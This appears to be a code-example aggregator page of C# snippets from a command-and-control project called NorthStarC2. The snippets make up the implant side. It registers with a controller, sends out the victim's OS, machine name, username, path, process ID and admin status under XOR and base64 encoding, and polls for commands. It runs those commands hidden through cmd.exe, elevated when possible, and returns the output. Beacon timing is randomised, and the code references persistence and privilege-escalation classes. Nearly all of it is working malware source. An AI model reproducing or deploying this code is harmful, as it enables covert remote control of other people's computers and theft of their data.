コード例 #1
0
ファイル: sendRetrieve.cs プロジェクト: xKhronoz/NorthStarC2
        /*
         * <explanation>
         * Send result of command to speficied uri as rspns.
         * </explanation>
         */
        public void _sendResult(String result, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
        {
            string asd = chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));


            string myParameters = "sid=" + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar")) + "&rspns=" + chipops._base64encode(chipops._xorOps(result, enumEnv.xorKey));

            web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";

            try
            {
                string sendResult = web.UploadString(Globals.resultSendUri, myParameters);
            }
            catch
            {
                while (true)
                {
                    if (errorCounter > 19)
                    {
                        break;
                    }
                    System.Threading.Thread.Sleep(enumEnv.waitTime);
                    try
                    {
                        _sendResult(result, web, enumEnv, chipops);
                        break;
                    }
                    catch
                    {
                        errorCounter++;
                    }
                }
                errorCounter = 0;
            }
        }
コード例 #2
0
ファイル: registerIn.cs プロジェクト: xKhronoz/NorthStarC2
 /*
  * <explanation>
  * First stage of registration process.
  * In this stage, client sends a GET request to login.php.
  * If "OK" returns by server second stage of registration process will start.
  * </explanation>
  */
 private void _registerFirstStage(initialEnum enumed)
 {
     if (errorCounter < 20)
     {
         _setID(ref enumed);
         string sid = chiperObj._base64encode(chiperObj._xorOps(enumed.clientID, "northstar"));
         web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
         try
         {
             string myParameters = "sid=" + sid;
             string stat         = web.UploadString(Globals.registerFirstStageUri, myParameters);
             enumed.xorKey = chiperObj._xorOps(chiperObj._base64decode(stat), Globals.tempKey);
             errorCounter  = 0;
             _registerSecondStage(ref enumed);
         }
         catch
         {
             errorCounter += 1;
             System.Threading.Thread.Sleep(5000);
             _registerFirstStage(enumed);
         }
     }
     else
     {
         isComplete = false;
     }
 }
コード例 #3
0
ファイル: sendRetrieve.cs プロジェクト: xKhronoz/NorthStarC2
 /*
  * <explanation>
  * Send GET request to speficied uri and return response as command.
  * </explanation>
  */
 public string _getCommand(String uri, System.Net.WebClient web, initialEnum enumEnv, Chiper chipops)
 {
     try
     {
         comm = web.DownloadString(uri);
         string clearedComm = Regex.Replace(comm, @"^\s+$[\r\n]*", string.Empty, RegexOptions.Multiline);
         string decodedComm = chipops._xorOps(chipops._base64decode(clearedComm), enumEnv.xorKey);
         return(decodedComm);
     }
     catch
     {
         while (true)
         {
             if (errorCounter > 19)
             {
                 break;
             }
             System.Threading.Thread.Sleep(enumEnv.waitTime);
             try
             {
                 comm = web.DownloadString(uri);
                 string clearCommand = chipops._xorOps(chipops._base64decode(comm), enumEnv.xorKey);
                 return(clearCommand);
             }
             catch
             {
                 errorCounter++;
             }
         }
         errorCounter = 0;
         return("");
     }
 }
コード例 #4
0
ファイル: registerIn.cs プロジェクト: xKhronoz/NorthStarC2
 public registerIn(initialEnum enumed, Chiper chipops, System.Net.WebClient webObj)
 {
     chiperObj = chipops;
     web       = webObj;
     if (clientId == null && isComplete == false)
     {
         _registerFirstStage(enumed);
     }
 }
コード例 #5
0
ファイル: registerIn.cs プロジェクト: xKhronoz/NorthStarC2
        /*
         * <explanation>
         * Creates 18 characters long Uniq client-id.
         * This ID will be used in any request will be sended to controller server.
         * For extra security layer  prepend character 'N' and append character 'q' are exists.
         * Those characters and length of ID will be checked by server to determine wether is valid client or not.
         * </explanation>
         */
        private void _setID(ref initialEnum enumed)
        {
            Random        random     = new Random();
            string        characters = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
            StringBuilder result     = new StringBuilder(16);

            for (int i = 0; i <= 16; i++)
            {
                result.Append(characters[random.Next(characters.Length)]);
            }

            clientId        = "N" + result.ToString() + "q";
            enumed.clientID = clientId;
        }
コード例 #6
0
ファイル: registerIn.cs プロジェクト: xKhronoz/NorthStarC2
        /*
         * <explanation>
         * Second stage of registration process.
         * In this stage; operating system, machine name, username, working directory, process id and current privileges are send to server
         * via POST request in base64 format. And if server returns "OK" as response, registration process will be marked as completed.
         * Otherwise, function waits for 5 seconds and tries to send POST request again.
         * <variable>isCompleted</variable> will be used for checking if registration process is completed.
         * </explanation>
         */
        private void _registerSecondStage(ref initialEnum enumed)
        {
            if (errorCounter < 20)
            {
                OperatingSystem os_info = System.Environment.OSVersion;

                string opsys   = chiperObj._base64encode(chiperObj._xorOps(enumed.osVer, enumed.xorKey));
                string mName   = chiperObj._base64encode(chiperObj._xorOps(enumed.mName, enumed.xorKey));
                string sus     = chiperObj._base64encode(chiperObj._xorOps(enumed.userName, enumed.xorKey));
                string wdir    = chiperObj._base64encode(chiperObj._xorOps(enumed.executablePath, enumed.xorKey));
                string isadmin = chiperObj._base64encode(chiperObj._xorOps(enumed.isAdmin.ToString(), enumed.xorKey));
                string pid     = chiperObj._base64encode(chiperObj._xorOps(enumed.processId.ToString(), enumed.xorKey));
                string id      = chiperObj._base64encode(chiperObj._xorOps(enumed.clientID, "northstar"));

                string myParameters = "sid=" + id + "&opsys=" + opsys + "&mName=" + mName + "&sus=" + sus + "&wdir=" + wdir + "&pid=" + pid + "&isadm=" + isadmin;

                web.Headers[System.Net.HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
                try
                {
                    string res = web.UploadString(Globals.registerSecondStageUri, myParameters);

                    if (!res.Contains("NOT FOUND"))
                    {
                        isComplete   = true;
                        errorCounter = 0;
                    }
                    else
                    {
                        errorCounter += 1;
                        System.Threading.Thread.Sleep(5000);
                        _registerSecondStage(ref enumed);
                    }
                }
                catch
                {
                    errorCounter += 1;
                    System.Threading.Thread.Sleep(5000);
                    _registerSecondStage(ref enumed);
                }
            }
            else
            {
                isComplete = false;
            }
        }
コード例 #7
0
        /*
         * <explanation>
         * This function is used for retrieving running processes from <method>GetCurrentProcess</method> of <class>Process</class>.
         * <namespace>System.Diagnostics</namespace> is required for this task.
         * </explanation>
         */
        public void _cmdMode(string command, sendRetrieve sendObj, initialEnum enumEnv, System.Net.WebClient web, Chiper chipops, String uri)
        {
            string result = "";

            Process p = new Process();

            p.StartInfo.FileName               = "cmd.exe";
            p.StartInfo.Arguments              = "/c" + command;
            p.StartInfo.CreateNoWindow         = true;
            p.StartInfo.UseShellExecute        = false;
            p.StartInfo.WorkingDirectory       = this._workingDir();
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError  = true;
            if (enumEnv.isAdmin)
            {
                p.StartInfo.Verb = "runas";
            }
            p.Start();
            result += p.StandardOutput.ReadToEnd();
            result += p.StandardError.ReadToEnd();
            sendObj._sendResult(result, web, enumEnv, chipops);
        }
コード例 #8
0
ファイル: Program.cs プロジェクト: xKhronoz/NorthStarC2
        static void Main(string[] args)
        {
            WebClient web = new WebClient();

            web.Proxy             = WebRequest.GetSystemWebProxy();
            web.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
            web.Credentials       = CredentialCache.DefaultCredentials;

            initialEnum         enumEnv        = new initialEnum();
            privilegeEscalation privs          = new privilegeEscalation();
            sendRetrieve        sendOrRetrieve = new sendRetrieve();
            Chiper         chipops             = new Chiper();
            addPersistence persistence         = new addPersistence();
            processCommand proc = new processCommand(enumEnv, privs, persistence);
            registerIn     register;


            int waitTimeCounter = 0;



            register = new registerIn(enumEnv, chipops, web);
            if (register.isComplete)
            {
                // persistence._copyItSelf();
                string commandRetrieveUri = Globals.commandRetrieveUri + chipops._base64encode(chipops._xorOps(enumEnv.clientID, "northstar"));

                while (true)
                {
                    string comm = sendOrRetrieve._getCommand(commandRetrieveUri, web, enumEnv, chipops);

                    if (!proc.cmdModeEnabled)
                    {
                        try
                        {
                            if (comm.Length >= 2)
                            {
                                if (comm == "die")
                                {
                                    break;
                                }
                                waitTimeCounter = 0;

                                string commandResult = proc._parseCommand(comm);

                                if (!proc.wasScreenshot && commandResult.Length > 1)
                                {
                                    sendOrRetrieve._sendResult(commandResult, web, enumEnv, chipops);
                                }

                                else
                                {
                                    proc.wasScreenshot = false;
                                }
                            }
                            else if (comm.Length < 2)
                            {
                                waitTimeCounter++;

                                if (waitTimeCounter > 40)
                                {
                                    enumEnv.isWaitTimeManuallySetted = false;
                                    waitTimeCounter = 0;
                                }
                            }
                        }
                        catch
                        {
                            System.Threading.Thread.Sleep(enumEnv.waitTime);
                        }
                    }
                    else     //if cmd mode enabled
                    {
                        if (comm.Length > 2)
                        {
                            if (comm == "exit" || comm == "break" || comm == "disablecmd")
                            {
                                proc.cmdModeEnabled = false;
                                sendOrRetrieve._sendResult("CMD mode disabled", web, enumEnv, chipops);
                            }

                            else
                            {
                                if (comm.Contains("wait"))
                                {
                                    sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
                                }
                                else if (comm.Contains("cd ") && !comm.Contains("cd ,"))
                                {
                                    sendOrRetrieve._sendResult(proc._parseCommand(comm), web, enumEnv, chipops);
                                }
                                else
                                {
                                    proc._cmdMode(comm, sendOrRetrieve, enumEnv, web, chipops, commandRetrieveUri);
                                }
                            }
                        }
                        else
                        {
                            waitTimeCounter++;
                            if (waitTimeCounter > 40)
                            {
                                enumEnv.isWaitTimeManuallySetted = false;
                                waitTimeCounter = 0;
                            }
                        }
                    }

                    System.Threading.Thread.Sleep(enumEnv.waitTime);
                    if (!enumEnv.isWaitTimeManuallySetted)
                    {
                        enumEnv.setRandomWaitTime();
                    }
                }
            }
        }
コード例 #9
0
 /*
  * <explanation>
  * Time interval to send GET request to the controller server.
  * Specified Get request is used to retrieve commands from server.
  * By default time interval is between 8 seconds to 23 seconds but i can be setted to
  * fixed interval by setting <variable>waitTime</variable> of <class>initialEnum</class> to a fixed value.
  * To control if <variable>waitTime</variable> setted by hand, another variable <variable>isWaitTimeManuallySetted</variable> is used.
  * </explanation>
  */
 public string _setWaitTime(initialEnum enumenv, string argument)
 {
     enumenv.waitTime = System.Convert.ToInt32(argument) * 1000;
     enumenv.isWaitTimeManuallySetted = true;
     return("Wait time is setted to: " + argument + " seconds");
 }
コード例 #10
0
 public processCommand(initialEnum enumEnv, privilegeEscalation priv, addPersistence persistenceObj)
 {
     enumObj = enumEnv;
     privs   = priv;
     persObj = persistenceObj;
 }